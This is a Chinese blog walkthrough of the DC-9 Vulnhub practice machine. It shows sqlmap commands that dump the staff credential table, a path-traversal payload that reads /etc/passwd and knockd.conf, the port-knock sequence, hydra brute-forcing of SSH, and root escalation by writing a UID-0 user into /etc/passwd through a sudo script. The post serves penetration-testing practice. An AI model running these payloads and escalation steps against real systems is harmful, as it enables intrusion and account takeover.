DC-9(knockd服务)

最新推荐文章于 2024-02-06 14:47:57 发布
最新推荐文章于 2024-02-06 14:47:57 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: DC系列靶场 文章标签: linux 运维 服务器 安全 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127262909
版权

环境准备

DC-9靶机链接:百度网盘 请输入提取码

提取码:arn4

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息搜集

1.探测目标靶机ip

arp-scan -l

2.探测目标靶机开放端口和服务情况

nmap -p- -A -T4 192.168.166.137

22端口关闭中 可能有knocked服务

漏洞利用

1.访问页面

2.页面有一个搜索框,尝试SQL注入


3.SQL注入漏洞

1>抓个包,把抓到的信息写进一个文本里,sqlmap跑一下

sqlmap -r wei.txt --current-db

2>sqlmap -r wei.txt -D Staff --tables

3>sqlmap -r wei.txt -D Staff -T Users --columns

4> sqlmap -r wei.txt -D Staff -T Users -C Username,Password --dump

5>sqlmap -r wei.txt --is-dba

4.文件读取漏洞

1>用爆破出的用户名密码登录

admin transorbital1

点击manage 根据他的有意思猜测可能有文件读取漏洞,有点侮辱智商。

2>?file=../../../../etc/passwd 成功查询到passwd文件


3>把用户名写进user.txt

root daemon bin sys sync games man lp mail news uucp proxy www-data
backup listirc gnats nobody _apt systemd-timesync systemd-network
systemd-resolve messagebus sshd ystemd-coredump mysql marym julied
fred barneyr tomc jerrym wilmaf bettyr chandlerb joeyt rachelg rossg
monicag phoebeb scoots janitor janitor2

4>这里尝试读取knockd服务的配置文件

?file=../../../../../etc/knockd.conf

5.依次敲击 7469 8475 9842 端口实现敲门操作 ,再次用nmap发现ssh开放

6.用hydra 爆破用户名密码

login:fredf password:B4-Tru3-001

login:chandlerb password: UrAG0D!

权限提升

1.ssh登录

2.sudo -l 发现 /opt目录下可以提权

查看test权限可读可执行 运行一下 提示用test.py

find / -name "test.py" 2>/dev/null //查找test.py文件位置

3.cd /opt/devstuff 去看下这个py脚本

4.openssl passwd -1 -salt 123456 //给密码加盐

echo 'test:$1$test$at615QShYKduQlx5z9Zm7/:0:0::/root:/bin/bash' >> /tmp/test

5.sudo ./test /tmp/test /etc/passwd

提权成功,拿下!!!

魏钦6666
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
knockd敲门服务
a1_pha的博客
01-27 589
端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。其中sequence设置序列号,seq_timeout设置超时时间。
系统安全加固(五) 使用knockd隐藏端口
Hey_1_Kong的博客
08-02 926
通过Knockd隐藏SSH端口或者其他开放的端口,让黑客无法扫描到你的端口,无法发现你的服务器
通过Knockd隐藏SSH,让黑客看不见你的服务器
大方子
01-11 2853
0X01设备信息: Ubuntu14.04:192.168.61.135 Kali:192.168.61.130 0X02配置过程: 先用Kali探测下Ubuntu的端口情况,可以看到Ubuntu的22端口是正常开放的 接下来在Ubuntu上安装Knockd apt-get install update apt-get install build-essential -y apt-get install knockd -y 安装完成后就cat下Knockd的配置/...
【Vulnhub靶机】DC-9(端口敲门服务Knockd
过期的秋刀鱼
08-11 499
服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。目前基本上都使用sha-512算法的,但无论是md5还是sha-256都仍然支持;用户名:密码hash值:uid:gid:说明:家目录:登陆后使用的shell。$salt$是加密时使用的salt,hashed才是真正的密码部分;下的一样的格式,保存在pass文件中。参数,读取请求的数据,来爆破数据库。
DC-9靶场渗透】
最新发布
一纸荒芜的博客
02-06 845
马上过年了,年前再做一下DC靶场最后一个靶机。
Vulnhub DC9|下载|渗透笔记|knockd敲门服务|文件包含漏洞
qq_60115503的博客
04-19 1304
VulnhubDC9下载靶场提取码:lyq1 将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透 主机发现 首先查看自己属于的网段ip 进行nmap主机发现 nmap -sP -sn 192.168.106.1/24 -sP进行主机发现发送ping包 -sn进行NULL扫描 探测到ip地址为192.168.106.129 所以我们进一步了解该靶场的服务 使用nmap -sV -A -T4 192.168.106......
knock-knock:测试默认Knockd配置以识别隐藏的远程服务的脚本
05-10
特征模式1-测试TCP端口22上隐藏的SSH服务此模式速度更快,但不够彻底出于某些原因,SSH是最常用的隐蔽服务VPN问题妨碍远程管理时,可以很好地回退通常用于远程管理未通过VPN管理的云服务模式2-测试所有65,536个端口...
tportknockd-开源
04-15
tportknockd检测到正确的敲门序列后,会短暂开放服务器上的一个或多个隐藏服务,允许客户端进行进一步的通信。 tportknockd的实现可能涉及以下关键技术点: 1. **端口监听**:tportknockd会监听所有或指定的非标准...
knock-once-开源
07-03
一个 BASH 脚本,可轻松创建随机化一次性序列列表,用于端口敲门服务器knockd,并使用端口敲门客户端knock 管理这些序列的发送。
Ansible-WebServer:用于一台或多台Web服务器(Nginx(前端)+ Apache(后端))的全自动部署的Playbook
02-11
适用于一台或多台Web服务器(Nginx + Apache)的全自动部署的Playbook 用法 安装Ansible: Debian: sudo apt install ansible 运行init.sh并按照说明进行操作: ./init.sh 警告:为了正确执行剧本操作,请勿直接...
SSH命令资料----常用
05-30
- 通过发送特定端口序列来开启 SSH 服务,例如: ```bash knock <host> 3000 4000 5000 && ssh -p <port> user@host && knock <host> 5000 4000 3000 ``` - 需要安装 `knockd` 并配置相应的规则,例如: ```...
knockd - 敲敲門, 敲對了就開門
weixin_33910759的博客
09-18 810
FROM: http://jamyy.dyndns.org/blog/2010/08/2596.html目的: 使用 knockd 保護指定埠口 作法: 使用者連線前必須先依序 '敲擊' 指定埠號 (port knocking), knockd 才開放受到保護的埠口 環境: Fedora 10 安裝 knockd cd /tmp wget http://ww...
Vulnhub靶场渗透测试系列DC-9(knockd敲门服务)
qq_45722813的博客
12-12 6384
Vulnhub靶场渗透测试系列DC-9 靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
Linux运维knockd部署
weixin_51339377的博客
12-27 1248
在基于Debian/Ubuntu/Ubuntu的服务器上,可以使用apt-get命令来安装knockd。要想在指定的IP地址处打开端口22,请在计算机上使用下列命令。使用knockd,你尽可放心:你的SSH服务器安全的,并且远离使用复杂扫描工具的攻击者。如果你有一台公众可访问的服务器,黑客可以轻松扫描其IP地址,查找服务器上的开放端口(尤其是用于SSH的端口22)。在你的服务器上,你可以使用nano或Vi。command:这是一旦客户软件的试探序列与序列字段中的模式,执行的命令。
【vulnhub】【DC系列】DC9 - Knockd 靶机
Nicky_Zheng的博客
01-26 865
1、信息收集 使用netdiscover发现靶机 ip:192.168.57.155 使用nmap发现仅开放80端口 1.1、尝试注入 访问页面后,发现search疑似存在SQL注入 使用nmap测试 sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: time-based blind
[原创]安全系列之端口敲门服务(Port Knocking for Ubuntu 14.04 Server)
weixin_30924087的博客
05-19 868
Port Knocking for Ubuntu 14.04 Server OS:ubuntu 14.04 server 原理简单分析:   端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提...
knockd 实现 ssh安全链接
weixin_34310785的博客
08-26 283
knockd 实现 ssh安全链接 转载于:https://blog.51cto.com/2242558/1545334
knock的安装及使用
weixin_33957648的博客
12-07 1683
下载http://www.invoca.ch/pub/packages/knock/knock-0.5-6.src.rpm 执行rpmbuild --rebuild knock-0.5-6.src.rpm(可能会需要yum install libpcap-devel) 出现如下代码 Wrote: /usr/src/redhat/RPMS/i386/knock-0.5-6...
Job for knockd.service failed because the control process exited with error code.
11-07
但是,根据该问题的描述,可能是由于knockd服务的控制进程出现错误代码而导致的。knockd是一个用于隐藏端口的工具,它允许用户通过敲击特定的端口序列来打开或关闭端口。如果knockd服务的控制进程出现错误代码,可能...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值